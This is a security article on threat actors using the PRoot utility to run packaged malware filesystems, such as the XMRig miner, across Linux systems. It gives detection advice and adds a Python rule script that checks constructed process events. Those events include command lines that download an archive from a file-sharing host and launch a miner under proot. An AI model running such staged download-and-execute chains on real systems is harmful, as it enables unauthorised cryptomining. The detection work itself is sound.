Researchers at Sysdig have uncovered a novel technique that threat actors are using to simplify attacks and make their malicious tooling reliably reusable across different Linux distributions. PRoot, a legitimate open-source Linux utility, is described by its creator as “…a user-space implementation of chroot, mount --bind, and binfmt_misc. This means that users don’t need any privileges or setup to do things like using an arbitrary directory as the new root filesystem, making files accessible somewhere else in the filesystem hierarchy, or executing programs built for another CPU architecture transparently through QEMU user-mode.” PRoot achieves this by using ptrace to intercept and rewrite the system calls of the programs it runs, so it needs neither root privileges nor any kernel support on the host.
Using PRoot, a threat actor who already has a foothold on a system can build a custom filesystem containing their malicious payloads and toolkits, deliver it to the victim device as a single archive, and run it under PRoot with that directory as the root. Deploying malware this way greatly increases its compatibility across Linux distributions: the attacker’s own filesystem provides a consistent operational environment (libraries, interpreters, configuration) regardless of what the host has installed, and QEMU (Quick Emulator) user-mode can bridge incompatible CPU architectures. For example, a piece of malware could be compiled for ARM but still run on an x86-based system. Because of this portability, threat actors can scale operations quickly and efficiently without being slowed down by the many differences between Linux systems that would otherwise cause their malware to fail.
Sysdig states that the most common use of this technique they have observed is to deliver and run the popular cryptocurrency miner XMRig and, in some cases, reconnaissance tools such as masscan or nmap. However, the same packaging could be used to deploy practically any malicious program with equal ease.
Threat actors observed using this technique have used free file-sharing services such as Google Drive, Dropbox, and OneDrive to host the compressed filesystem containing their malware, making it readily accessible from victim devices. Organizations should monitor for connections to these file-sharing services, especially ones that are not normally used in the organization’s business processes. Because legitimate use of these services is common, such connections are best treated as one indicator to correlate with the others below rather than as a standalone alert.
Organizations may also find it useful to monitor for execution of the PRoot tool, which in the observed attacks was invoked on the command line simply as ‘./proot’; note that the binary name is attacker-controlled and can be changed, so this check is easy to evade on its own. The researchers at Sysdig noted that, in the attacks they observed, the malicious filesystems were placed under “/tmp/PRoot”, though they could be placed in a large number of other locations. The use of wget or curl with a URL containing the string “proot” should be a red flag for this type of attack.
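The following is an added example, not code from Sysdig or the PRoot project, that turns the indicators from the last two paragraphs (a proot binary being executed, wget/curl fetching a URL mentioning “proot” or hosted on a file-sharing service, and activity under /tmp/PRoot) into detection rules and runs them over a handful of constructed process-execution events. The event format, the PIDs, the URLs and the file-sharing host list are all constructed for illustration; the PRoot options it parses (`-r`/`-S` for the guest rootfs, `-q` for the QEMU binary) are real PRoot options, but the invocation shown is hypothetical.

```python
"""Constructed detection example for the PRoot technique described above."""
import os
import shlex
from dataclasses import dataclass
from urllib.parse import urlparse

# Indicators from the text: the staging directory seen by Sysdig and the
# downloaders whose URLs should be inspected. The host list is a constructed,
# non-exhaustive illustration of the file-sharing services named.
PROOT_DIR = "/tmp/PRoot"
DOWNLOADERS = {"curl", "wget"}
FILE_SHARING_HOSTS = {"drive.google.com", "dropbox.com", "www.dropbox.com", "onedrive.live.com"}

# Constructed process-execution events (not real telemetry), one per line:
# "<pid> <comm> <cwd> <cmdline>", modelled loosely on an exec audit record.
# The file id "EXAMPLE" and the example.org URLs are placeholders.
SAMPLE_EVENTS = """\
1201 curl /tmp curl -sL https://drive.google.com/uc?id=EXAMPLE -o /tmp/PRoot/rootfs.tar.gz
1202 tar /tmp/PRoot tar xzf /tmp/PRoot/rootfs.tar.gz -C /tmp/PRoot/rootfs
1203 proot /tmp/PRoot ./proot -r /tmp/PRoot/rootfs -q qemu-arm-static -w / /bin/sh -c /opt/xmrig
1204 wget /home/dev wget https://example.org/files/proot-x86_64 -O /home/dev/proot
1205 curl /home/dev curl -s https://example.org/api/status
1206 bash /home/dev /bin/bash -c uptime
"""


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def parse_event(line: str):
    """Split one constructed event into (pid, comm, cwd, argv)."""
    pid, comm, cwd, cmdline = line.split(maxsplit=3)
    return int(pid), comm, cwd, shlex.split(cmdline)


def proot_options(argv):
    """Pull the guest rootfs (-r/-S) and QEMU binary (-q) out of a proot argv.
    Both options take a value as the next argument; other options are ignored."""
    opts = {"rootfs": None, "qemu": None}
    for i, arg in enumerate(argv):
        if i + 1 >= len(argv):
            break
        if arg in ("-r", "-S"):
            opts["rootfs"] = argv[i + 1]
        elif arg == "-q":
            opts["qemu"] = argv[i + 1]
    return opts


def analyse(pid, cwd, argv):
    """Apply the three indicator rules from the text to one event."""
    findings = []
    exe = os.path.basename(argv[0])  # "./proot" and "/usr/bin/proot" both match
    urls = [a for a in argv if a.startswith(("http://", "https://"))]

    # Rule 1: the PRoot binary itself being executed (evadable by renaming).
    if exe == "proot":
        opts = proot_options(argv)
        findings.append(Finding(pid, "PROOT_EXEC",
                                f"rootfs={opts['rootfs']} qemu={opts['qemu']}"))

    # Rule 2: wget/curl fetching a "proot" URL, or fetching from a file-sharing host.
    if exe in DOWNLOADERS:
        for url in urls:
            if "proot" in url.lower():
                findings.append(Finding(pid, "PROOT_DOWNLOAD", url))
            if urlparse(url).hostname in FILE_SHARING_HOSTS:
                findings.append(Finding(pid, "FILESHARE_DOWNLOAD", url))

    # Rule 3 (lowest fidelity): activity under the staging directory Sysdig saw.
    # The directory is attacker-chosen, so treat this as corroboration only.
    if cwd.startswith(PROOT_DIR) or any(a.startswith(PROOT_DIR) for a in argv):
        findings.append(Finding(pid, "PROOT_DIR", PROOT_DIR))
    return findings


def scan(events: str):
    """Run the rules over every non-empty event line and collect findings."""
    findings = []
    for line in events.splitlines():
        if line.strip():
            pid, _comm, cwd, argv = parse_event(line)
            findings.extend(analyse(pid, cwd, argv))
    return findings


def rules_by_pid(events: str):
    """Map each flagged pid to the set of rule names that fired for it."""
    out = {}
    for f in scan(events):
        out.setdefault(f.pid, set()).add(f.rule)
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f.pid} {f.rule}: {f.detail}")
```

Run against the constructed events, only the download (1201), unpack (1202), proot launch (1203) and proot fetch (1204) events fire; the benign curl and bash events do not. In a real deployment the same rules would be fed by auditd execve records or an EDR’s process telemetry, and an alert should be raised on the combination of rules (for example PROOT_EXEC together with a preceding FILESHARE_DOWNLOAD) rather than on the noisy file-sharing rule alone.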